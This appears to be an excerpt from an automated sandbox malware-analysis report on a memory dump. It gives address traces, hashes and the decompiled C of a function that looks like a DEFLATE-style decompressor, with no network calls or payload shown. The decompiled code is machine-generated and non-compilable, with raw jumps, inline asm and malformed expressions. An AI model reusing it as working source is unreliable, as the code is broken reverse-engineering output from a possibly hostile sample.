0x02d65ab2
0x02d65ab5
0x02d65ab8
0x02d65ab8
0x00000000
0x02d65abd
0x02d65a3a
0x00000000
0x02d65a31
0x02d658f8
0x02d65f64
0x02d65f73
0x02d65f7d
0x02d65f93
0x02d65fa9
0x02d65fb2
0x02d65fb7
0x02d65fba
0x02d65fbd
0x02d65fc0
0x02d65fc2
0x02d65fc4
0x02d65fc4
0x02d65fd0
0x02d65fd0
0x02d65fd0
0x02d65fd4
0x02d65fd5
0x02d65fdc
0x02d65fdc
0x02d65fd0
0x02d65fe0
0x02d65fe0
0x02d65fe5
0x02d65fe6
0x02d65fe7
0x02d65fe8
0x02d65fe9
0x02d65fe9
0x02d65fef
0x02d65ff5
0x02d65ff8
0x02d66000
0x02d66000
0x02d66000
0x02d66009
0x02d6600b
0x02d6600d
0x02d66014
0x02d66017
0x02d66020
0x02d66027
0x02d66029
0x02d6602c
0x02d66035
0x02d66037
0x02d6603e
0x02d66041
0x02d66041
0x02d6604c
0x02d6604f
0x02d66055
0x02d66058
0x02d6605a
0x02d66061
0x02d6606c
0x02d6606c
0x02d6606f
0x02d66076
0x02d6607d
0x02d66080
0x02d66086
0x02d66086
0x02d66090
0x02d66090
0x02d66095
0x02d66095
0x02d66099
0x02d6609c
0x02d6609e
0x02d660a4
0x02d660a4
0x02d660ab
0x02d660af
0x02d660b6
0x02d660b9
0x02d660bb
0x00000000
0x02d660c0
0x02d660c0
0x02d660cb
0x02d660ce
0x02d660cf
0x02d660d1
0x02d660d4
0x02d660d4
0x02d660d8
0x02d660d8
0x02d660db
0x02d660db
0x02d660de
0x02d6612d
0x02d6613d
0x02d66140
0x02d66143
0x02d66146
0x02d66149
0x02d6614c
0x02d6614e
0x02d66153
0x02d66156
0x02d66158
0x02d66158
0x02d6615b
0x02d6615e
0x02d6615e
0x02d66161
0x02d66161
0x02d66164
0x02d66167
0x02d66169
0x02d66169
0x02d66169
0x02d6616c
0x02d6616f
0x02d66172
0x02d66172
0x02d66172
0x02d66180
0x02d66185
0x02d66189
0x02d6618c
0x02d661a4
0x02d6618e
0x02d66191
0x02d66195
0x02d66198
0x02d6619a
0x02d6619d
0x02d661a0
0x02d661a0
0x02d661a7
0x02d661a7
0x02d661a7
0x02d661a7
0x02d661a7
0x02d661ac
0x02d661af
0x02d661af
0x02d661b1
0x02d661b6
0x02d661b6
0x02d661bb
0x02d660e0
0x02d660e0
0x02d660e7
0x02d660ea
0x02d660ed
0x02d660f3
0x02d660f9
0x02d660f9
0x02d660fe
0x02d660ff
0x02d66100
0x02d66101
0x02d66101
0x02d66106
0x02d6610f
0x02d6610f
0x02d66115
0x02d66115
0x02d66115
0x02d66118
0x02d6611a
0x02d6611d
0x02d6611d
0x02d66125
0x02d66125
0x02d660f3
0x02d660de
0x02d661c3
0x02d661c3
0x02d661c6
0x02d661c7
0x02d661c7
0x02d661d1
0x02d661d6
0x02d661d6
0x02d661d7
0x02d661d7
0x02d661db
0x02d663f6
0x02d663f6
0x00000000
0x02d661e1
0x02d661e1
0x02d661e1
0x02d661e1
0x02d661e3
0x02d661e3
0x02d661e3
0x02d661e6
0x02d661e6
0x02d661ec
0x02d661ef
0x02d661f1
0x00000000
0x00000000
0x02d661f7
0x02d661f7
0x02d661fa
0x02d662b2
0x02d662b9
0x02d662c1
0x02d662c4
0x02d662c6
0x02d662d7
0x00000000
0x02d662e0
0x02d662e0
0x02d662e0
0x02d662e5
0x02d662e7
0x02d662ee
0x02d662f6
0x02d662f9
0x02d662f9
0x02d662c8
0x02d662c8
0x02d662ca
0x02d662cd
0x02d662d2
0x02d662d2
0x02d662fd
0x02d662fd
0x02d662ff
0x02d66301
0x02d66304
0x02d66307
0x02d6630a
0x02d6631c
0x02d6631c
0x02d6632c
0x02d6632c
0x02d66333
0x02d66336
0x02d66338
0x02d66360
0x02d6636e
0x02d66371
0x02d66378
0x02d6637b
0x02d6637d
0x02d66381
0x02d66384
0x02d66387
0x02d66393
0x02d66393
0x02d66389
0x02d66389
0x02d66389
0x02d66395
0x02d663a0
0x02d663a9
0x02d663ac
0x02d663ae
0x02d661e3
0x02d661e3
0x00000000
0x02d6633a
0x02d6633a
0x02d6633a
0x02d6633a
0x02d6633d
0x00000000
0x00000000
0x02d66343
0x02d66348
0x02d6634a
0x02d6634b
0x02d6634e
0x02d66350
0x02d66353
0x02d66356
0x02d66359
0x02d6635b
0x00000000
0x02d6635d
0x02d6635d
0x02d6635d
0x00000000
0x02d6635d
0x00000000
0x02d6635b
0x02d665b6
0x02d665b6
0x00000000
0x02d665b6
0x02d6631e
0x02d6631e
0x02d6631e
0x02d66321
0x02d66323
0x02d66698
0x02d66698
0x02d6669b
0x00000000
0x02d66329
0x02d66329
0x02d66329
0x00000000
0x02d66329
0x02d66323
0x02d6630c
0x02d6630c
0x02d6630c
0x02d6630f
0x02d66316
0x00000000
0x02d66316
0x02d66200
0x02d66200
0x02d66205
0x02d66208
0x02d6628e
0x02d6628e
0x02d66295
0x02d66298
0x02d6629d
0x02d662a3
0x02d662a6
0x02d662a9
0x02d662a9
0x02d662ac
0x00000000
0x02d6620e
0x02d6620e
0x02d6620e
0x02d66210
0x02d66215
0x02d6621d
0x02d6621f
0x02d66232
0x02d66232
0x02d66235
0x00000000
0x02d66237
0x02d66237
0x02d6623c
0x02d6623c
0x02d66240
0x02d66240
0x02d6624e
0x02d66259
0x02d6625a
0x02d6625d
0x02d6625f
0x00000000
0x00000000
0x02d66261
0x02d66261
0x02d66264
0x02d66266
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02d66266
0x00000000
0x02d66240
0x02d66221
0x02d66221
0x02d66221
0x02d66224
0x02d66226
0x02d66268
0x02d66268
0x02d6626b
0x02d6626b
0x02d6626e
0x02d665ab
0x02d665ab
0x00000000
0x00000000
0x00000000
0x00000000
0x02d66228
0x02d66228
0x02d66228
0x02d6622a
0x02d662af
0x02d662af
0x00000000
0x02d66230
0x02d66230
0x00000000
0x02d66230
0x02d6622a
0x02d66226
0x00000000
0x02d66274
0x02d66277
0x02d66279
0x02d6627b
0x02d6627c
0x02d6627e
0x02d66281
0x02d66284
0x02d66287
0x02d66287
0x00000000
0x02d6628c
0x02d66208
0x00000000
0x02d661fa
0x02d663b6
0x02d663b9
0x02d663bc
0x02d663be
0x02d663c0
0x02d666a6
0x02d666a6
0x02d666a9
0x00000000
0x02d663c6
0x02d663c6
0x02d663d2
0x02d663e3
0x02d663e3
0x02d663ed
0x02d663f3
0x00000000
0x02d663f3
0x00000000
0x02d663c0
0x02d661e3
0x02d66063
0x02d66063
0x02d66063
0x02d66066
0x02d66686
0x02d66686
0x02d6668d
0x00000000
0x00000000
0x00000000
0x00000000
0x02d66066
0x00000000
0x02d66061

APIs

memset.NTDLL ref: 02D65EEE
memset.NTDLL ref: 02D65F7D
memset.NTDLL ref: 02D65F93
memset.NTDLL ref: 02D65FA9

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: dd26236c04f206cf22ad88b9d4730d66ae7f3333c8681626aa938f51e9c5ae1b
Instruction ID: 60d278af3b32906a37ff09adf64c6a791eed0d77be26ec4b7c644a20e61f6e37
Opcode Fuzzy Hash: dd26236c04f206cf22ad88b9d4730d66ae7f3333c8681626aa938f51e9c5ae1b
Instruction Fuzzy Hash: 7C31BFB1E44205AFDB08CFA0D8957ADBBF4FB48305F1441A9E546A7781E778EA94CF80

Uniqueness

Uniqueness Score: -1.00%

Function 02D65D95, Relevance: 5.1, APIs: 4, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02D65D95(void* __eax, void* __ebx, void* __edi) {
				intOrPtr* _t597;
				void* _t598;
				signed int _t600;
				signed int _t603;
				signed int _t605;
				void* _t608;
				signed int _t609;
				signed int _t612;
				signed int _t614;
				signed int _t617;
				signed int _t618;
				signed int _t624;
				signed int _t625;
				void* _t628;
				signed int _t630;
				void* _t631;
				signed int _t641;
				signed int* _t651;
				signed int _t654;
				signed int _t671;
				signed int _t673;
				signed int _t675;
				signed int _t685;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t695;
				unsigned int _t698;
				void* _t699;
				signed int _t707;
				signed int _t710;
				signed int _t721;
				signed int _t725;
				signed int _t727;
				void* _t730;
				signed int _t732;
				signed int _t733;
				intOrPtr _t734;
				signed char _t738;
				intOrPtr* _t740;
				void* _t741;
				signed int _t749;
				signed int _t753;
				signed int _t758;
				signed int _t764;
				signed int _t767;
				void* _t769;
				intOrPtr _t782;
				intOrPtr _t783;
				intOrPtr _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t802;
				signed int _t804;
				signed int _t808;
				signed int _t812;
				signed int _t815;
				signed int _t819;
				void* _t824;
				signed int _t828;
				void* _t829;
				signed int _t834;
				void* _t835;
				void* _t836;
				signed int _t841;
				signed int _t842;
				signed char _t844;
				signed int _t845;
				void* _t847;
				void* _t851;
				signed int _t853;
				intOrPtr _t854;
				signed char _t860;
				signed int _t861;
				signed int _t862;
				signed char _t863;
				signed char _t864;
				intOrPtr _t866;
				void* _t869;
				void* _t870;
				void* _t871;
				signed int _t874;
				signed int _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				signed char _t894;
				signed int _t896;
				void* _t897;
				void* _t898;
				signed int _t901;
				signed int _t902;
				signed char _t903;
				intOrPtr _t905;
				intOrPtr _t907;
				void* _t910;
				signed char _t911;
				signed char _t912;
				signed char _t913;
				signed int _t917;
				signed char _t922;
				void* _t923;
				void* _t924;
				signed int _t927;
				signed char* _t932;
				signed int _t936;
				signed char _t940;
				signed int _t941;
				signed char _t944;
				signed int _t945;
				void* _t953;
				signed int _t968;
				signed int _t969;
				signed int _t972;
				signed int _t974;
				signed int _t978;
				signed int* _t979;
				signed char* _t984;
				void* _t985;
				void* _t990;
				signed int _t991;
				signed int _t994;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1000;
				signed int _t1003;
				signed int _t1004;
				int _t1005;
				int _t1007;
				signed int _t1008;
				unsigned int _t1011;
				void* _t1015;
				intOrPtr _t1016;
				signed int _t1017;
				signed int _t1021;
				signed char _t1025;
				void* _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1039;
				void* _t1041;
				int _t1046;
				signed int _t1047;
				signed int _t1049;
				signed int _t1050;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed char _t1064;
				void* _t1065;
				void* _t1067;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t597 = __eax + 1 - 0x20;
					 *_t597 =  *_t597 + _t597;
					_t847 = __ebx + _t597;
					_t598 = _t597 + 1;
					 *_t598 =  *_t598 ^ _t598;
					 *_t598 = _t598 +  *_t598;
					 *0xde0 =  *0xde0 + _t598;
					memset(_t598, ??, ??);
					asm("movdqa xmm0, [0x2d71ae0]");
					_t1068 = _t1067 + 0xc;
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqu [edi+0x70], xmm0");
					asm("movdqu [edi+0x80], xmm0");
					asm("movdqu [edi+0x90], xmm0");
					asm("movdqu [edi+0xa0], xmm0");
					asm("movdqu [edi+0xb0], xmm0");
					asm("movdqu [edi+0xc0], xmm0");
					_t1029 = __edi + 0xd0;
					asm("movdqa xmm0, [0x2d71af0]");
					asm("movdqu [edi], xmm0");
					asm("movdqu [edi+0x10], xmm0");
					asm("movdqu [edi+0x20], xmm0");
					asm("movdqu [edi+0x30], xmm0");
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqa xmm0, [0x2d71ad0]");
					asm("movdqu [edi+0x70], xmm0");
					asm("movq [edi+0x80], xmm0");
					 *((intOrPtr*)(_t1029 + 0x88)) = 0x8080808;
					 *((intOrPtr*)(_t1029 + 0x8c)) = 0x8080808;
					_t1030 =  *(_t1065 - 0x14);
					while(1) {
						L141:
						_t600 =  *(_t1030 + 0x18);
						if(_t600 >= 0) {
							break;
						}
						L218:
						_t968 =  *(_t1065 - 4);
						while(1) {
							L39:
							_t860 =  *(_t1065 - 0x20) - _t847;
							__eflags = _t860 - 4;
							if(_t860 < 4) {
								goto L58;
							}
							L40:
							_t1030 =  *(_t1065 - 0x14);
							__eflags =  *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) - 2;
							if( *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1050 - 0xf;
								if(_t1050 < 0xf) {
									_t1017 =  *(_t847 + 1) & 0x000000ff;
									_t860 = _t1050;
									_t733 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1017 << 0x00000008 | _t733) << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
								}
								_t618 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t618;
								__eflags = _t618;
								if(_t618 < 0) {
									L45:
									goto 0x2d8145c;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t685 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t618 = (_t685 & 0x00000001) +  !_t847;
										_t847 =  *((short*)(_t1030 + 0x960 + _t618 * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L44:
									_t860 = _t618 >> 9;
								}
								L48:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 & 0x00000100;
								if((_t861 & 0x00000100) != 0) {
									L84:
									_t862 = _t861 & 0x000001ff;
									 *(_t1065 - 8) = _t862;
									__eflags = _t862 - 0x100;
									if(_t862 != 0x100) {
										L219:
										_t608 = _t862 * 4 - 0x404;
										_t863 =  *(_t608 + 0x2d71010);
										_t609 =  *(_t608 + 0x2d71a48);
										 *(_t1065 - 0x38) = _t863;
										 *(_t1065 - 8) = _t609;
										__eflags = _t863;
										if(_t863 == 0) {
											L225:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L3:
												_t612 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
												 *(_t1065 - 0x1c) = _t612;
												__eflags = _t612;
												if(_t612 < 0) {
													L5:
													goto 0x2d813e3;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t614 = _t968 >> _t863;
														_t863 = _t863 + 1;
														_t847 =  *((short*)(_t1030 + 0x1700 + ((_t614 & 0x00000001) +  !_t847) * 2));
														__eflags = _t847;
													} while (_t847 < 0);
													 *(_t1065 - 0x1c) = _t847;
													_t847 =  *(_t1065 - 0x18);
													_t617 =  *(_t1065 - 0x1c);
												} else {
													L4:
													_t863 = _t612 >> 9;
													_t617 = _t612 & 0x000001ff;
												}
												L9:
												_t968 = _t968 >> _t863;
												_t1050 = _t1050 - _t863;
												_t864 =  *(0x2d71090 + _t617 * 4);
												_t618 =  *(0x2d71110 + _t617 * 4);
												 *(_t1065 - 4) = _t968;
												 *(_t1065 - 0x38) = _t864;
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t864;
												if(_t864 == 0) {
													L15:
													_t866 =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 + 0xc));
													 *((intOrPtr*)(_t1065 - 0x48)) = _t866;
													__eflags = _t618 - _t866;
													if(_t618 <= _t866) {
														L17:
														_t1030 =  *(_t1065 - 0x14);
														_t869 = (_t866 - _t618 &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc));
														__eflags =  *(_t1065 - 0x10) - _t869;
														 *(_t1065 - 0xc) = _t869;
														_t620 =  >  ?  *(_t1065 - 0x10) : _t869;
														_t870 =  *(_t1065 - 8);
														_t621 = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870;
														__eflags = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870 -  *((intOrPtr*)(_t1065 - 0x40));
														if(( >  ?  *(_t1065 - 0x10) : _t869) + _t870 <=  *((intOrPtr*)(_t1065 - 0x40))) {
															L21:
															__eflags = _t870 - 9;
															if(_t870 < 9) {
																L30:
																goto 0x2d81420;
																asm("int3");
																do {
																	L32:
																	_t870 = _t870 - 3;
																	 *_t1030 =  *_t968 & 0x000000ff;
																	 *((char*)(_t1030 + 1)) =  *(_t968 + 1) & 0x000000ff;
																	_t624 =  *(2 + _t968) & 0x000000ff;
																	_t968 = _t968 + 3;
																	 *(2 + _t1030) = _t624;
																	_t1030 = _t1030 + 3;
																	__eflags = _t870 - 2;
																} while (_t870 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t870 -  *(_t1065 - 0x28);
																if(_t870 >  *(_t1065 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1041 =  *(_t1065 - 0xc);
																	_t871 =  *(_t1065 - 0x10);
																	_t738 = _t1041 + (_t870 & 0xfffffff8);
																	 *(_t1065 - 0x24) = _t738;
																	_t1025 = _t738;
																	do {
																		L24:
																		 *_t871 =  *_t1041;
																		_t740 =  *((intOrPtr*)(_t1041 + 4));
																		_t1041 = _t1041 + 8;
																		 *((intOrPtr*)(_t871 + 4)) = _t740;
																		_t871 = _t871 + 8;
																		__eflags = _t1041 - _t1025;
																	} while (_t1041 < _t1025);
																	_t968 =  *(_t1065 - 4);
																	 *(_t1065 - 0x10) = _t871;
																	_t870 =  *(_t1065 - 8) & 0x00000007;
																	 *(_t1065 - 0xc) = _t1041;
																	_t1030 =  *(_t1065 - 0x14);
																	 *(_t1065 - 8) = _t870;
																	__eflags = _t870 - 3;
																	if(_t870 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t741 = _t870;
																_t870 = _t870 - 1;
																 *(_t1065 - 8) = _t870;
																__eflags = _t741;
																if(_t741 == 0) {
																	goto L39;
																}
																L19:
																__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																	L238:
																	 *(_t1065 - 0xc) = 2;
																	 *_t1030 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																	 *((intOrPtr*)(_t1065 - 0x48)) =  *((intOrPtr*)(_t1065 - 0x48)) + 1;
																	 *( *(_t1065 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1065 - 0x48)) -  *(_t1065 - 0x28) &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc))));
																	_t968 =  *(_t1065 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t860 =  *(_t1065 - 0x20) - _t847;
																__eflags = _t860 - 4;
																if(_t860 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L16:
														__eflags =  *(_t1065 + 0x18) & 0x00000004;
														if(( *(_t1065 + 0x18) & 0x00000004) != 0) {
															L270:
															_t689 = _t618 | 0xffffffff;
															 *_t1030 = 0x25;
															goto L291;
														} else {
															goto L17;
														}
													}
												} else {
													L10:
													__eflags = _t1050 - _t864;
													if(_t1050 >= _t864) {
														L13:
														_t1050 = _t1050 - _t864;
														_t749 = (_t618 << _t864) - 0x00000001 & _t968;
														_t968 = _t968 >> _t864;
														_t28 = _t1065 - 0x28;
														 *_t28 =  *(_t1065 - 0x28) + _t749;
														__eflags =  *_t28;
														_t618 =  *(_t1065 - 0x28);
														 *(_t1065 - 4) = _t968;
														goto L15;
													} else {
														while(1) {
															L11:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L12:
															_t618 = ( *_t847 & 0x000000ff) << _t1050;
															_t847 = _t847 + 1;
															_t864 =  *(_t1065 - 0x38);
															_t968 = _t968 | _t618;
															_t1050 = _t1050 + 8;
															 *(_t1065 - 0x18) = _t847;
															 *(_t1065 - 4) = _t968;
															__eflags = _t1050 - _t864;
															if(_t1050 < _t864) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														L263:
														 *_t1030 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1065 - 0x20) - _t847 - 2;
												if( *(_t1065 - 0x20) - _t847 >= 2) {
													L237:
													_t991 =  *(_t847 + 1) & 0x000000ff;
													_t753 =  *_t847 & 0x000000ff;
													_t847 = _t847 + 2;
													_t1030 =  *(_t1065 - 0x14);
													_t863 = _t1050;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) =  *(_t1065 - 4) | _t991 << _t1050 + 0x00000008 | _t753 << _t863;
													_t1050 = _t1050 + 0x10;
													_t968 =  *(_t1065 - 4);
												} else {
													do {
														L227:
														_t618 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
														 *(_t1065 - 0x24) = _t618;
														__eflags = _t618;
														if(_t618 < 0) {
															L231:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1065 - 0x1c) = _t863;
																while(1) {
																	L234:
																	_t863 =  *((short*)(_t1030 + 0x1700 + ((_t968 >> _t863 & 0x00000001) +  !( *(_t1065 - 0x24))) * 2));
																	_t764 =  *(_t1065 - 0x1c) + 1;
																	 *(_t1065 - 0x24) = _t863;
																	 *(_t1065 - 0x1c) = _t764;
																	__eflags = _t863;
																	if(_t863 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t618 = _t764 + 1;
																	__eflags = _t1050 - _t618;
																	if(_t1050 < _t618) {
																		goto L1;
																	} else {
																		L236:
																		_t863 =  *(_t1065 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t618 = _t618 >> 9;
															__eflags = _t618;
															if(_t618 == 0) {
																L1:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L264:
																	 *_t1030 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t863 = _t1050;
														_t758 = ( *_t847 & 0x000000ff) << _t863;
														_t847 = _t847 + 1;
														_t968 = _t968 | _t758;
														 *(_t1065 - 0x18) = _t847;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 4) = _t968;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1050 - _t863;
											if(_t1050 >= _t863) {
												L223:
												L224:
												_t1050 = _t1050 - _t863;
												_t767 = (_t609 << _t863) - 0x00000001 & _t968;
												_t968 = _t968 >> _t863;
												_t456 = _t1065 - 8;
												 *_t456 =  *(_t1065 - 8) + _t767;
												__eflags =  *_t456;
												 *(_t1065 - 4) = _t968;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L222:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t863 =  *(_t1065 - 0x38);
													_t968 = _t968 | _t618;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - _t863;
													if(_t1050 < _t863) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1030 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1030 + 0x14) & 0x00000001;
											if(( *(_t1030 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1050 - 3;
											if(_t1050 >= 3) {
												L89:
												_t1050 = _t1050 - 3;
												_t698 = _t968 & 0x00000007;
												_t999 = _t968 >> 3;
												 *(_t1030 + 0x14) = _t698;
												_t699 = _t698 >> 1;
												__eflags = _t699;
												 *(_t1065 - 4) = _t999;
												 *(_t1065 - 0x1c) = _t1050;
												 *(_t1030 + 0x18) = _t699;
												if(_t699 != 0) {
													L124:
													__eflags = _t699 - 3;
													if(_t699 == 3) {
														L266:
														 *(_t1065 - 0xc) = 0xffffffff;
														 *_t1030 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t699 - 1;
														if(__eflags != 0) {
															L127:
															_t901 = 0;
															__eflags = 0;
															while(1) {
																L128:
																 *(_t1065 - 8) = _t901;
																__eflags = _t901 - 3;
																if(_t901 >= 3) {
																	break;
																}
																L129:
																_t618 =  *((char*)(_t901 + 0x2d71004));
																 *(_t1065 - 0x1c) = _t618;
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	L132:
																	_t1015 = _t1030 + _t901 * 4;
																	_t1036 =  *(_t1065 - 4);
																	 *(_t1015 + 0x2c) = (0x00000001 <<  *(_t1065 - 0x1c)) - 0x00000001 & _t1036;
																	_t707 =  *(_t1065 - 8);
																	_t940 =  *((char*)(_t707 + 0x2d71004));
																	_t1037 = _t1036 >> _t940;
																	_t1050 = _t1050 - _t940;
																	_t941 = _t707;
																	 *(_t1065 - 4) = _t1037;
																	 *(_t1065 - 0x1c) = _t1050;
																	 *(_t1015 + 0x2c) =  *(_t1015 + 0x2c) +  *((intOrPtr*)(0x2d71a38 + _t941 * 4));
																	_t999 = _t1037;
																	_t1030 =  *(_t1065 - 0x14);
																	_t901 = _t941 + 1;
																	continue;
																} else {
																	while(1) {
																		L130:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L131:
																		_t710 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t901 =  *(_t1065 - 8);
																		_t999 = _t999 | _t710;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 0x18) = _t847;
																		 *(_t1065 - 4) = _t999;
																		_t618 =  *((char*)(_t901 + 0x2d71004));
																		 *(_t1065 - 0x1c) = _t618;
																		__eflags = _t1050 - _t618;
																		if(_t1050 < _t618) {
																			continue;
																		} else {
																			goto L132;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1030 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L133:
															L134:
															_t618 = memset(_t1030 + 0x1b80, 0, ??);
															_t1000 =  *(_t1065 - 4);
															_t1068 = _t1068 + 0xc;
															_t902 = 0;
															__eflags = 0;
															while(1) {
																L135:
																 *(_t1065 - 8) = _t902;
																__eflags = _t902 -  *((intOrPtr*)(_t1030 + 0x34));
																if(__eflags >= 0) {
																	break;
																}
																L136:
																__eflags = _t1050 - 3;
																if(_t1050 >= 3) {
																	L139:
																	_t936 = _t1000 & 0x00000007;
																	_t1000 = _t1000 >> 3;
																	_t1050 = _t1050 - 3;
																	 *(_t1065 - 4) = _t1000;
																	 *(_t1065 - 0x1c) = _t1050;
																	_t618 =  *( *(_t1065 - 8) + 0x2d71a24) & 0x000000ff;
																	 *(_t1030 + 0x1b80 + _t618) = _t936;
																	_t902 =  *(_t1065 - 8) + 1;
																	continue;
																} else {
																	while(1) {
																		L137:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L138:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t1000 = _t1000 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t1000;
																		__eflags = _t1050 - 3;
																		if(_t1050 < 3) {
																			continue;
																		} else {
																			goto L139;
																		}
																		goto L295;
																	}
																	L249:
																	 *_t1030 = 0xe;
																	goto L285;
																}
																goto L295;
															}
															L140:
															 *((intOrPtr*)(_t1030 + 0x34)) = 0x13;
															goto L141;
														} else {
															L126:
															goto 0x2d814d8;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t699 + 0x2c)) = 0x120;
															goto L0;
														}
													}
												} else {
													L90:
													_t618 = _t1050 & 0x00000007;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														L93:
														_t944 = _t1050 & 0x00000007;
														_t968 = _t999 >> _t944;
														_t1050 = _t1050 - _t944;
														 *(_t1065 - 4) = _t968;
														_t945 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1065 - 8) = _t945;
															__eflags = _t945 - 4;
															if(_t945 >= 4) {
																break;
															}
															L95:
															__eflags = _t1050;
															if(_t1050 == 0) {
																L101:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L244:
																	 *_t1030 = 7;
																	goto L285;
																} else {
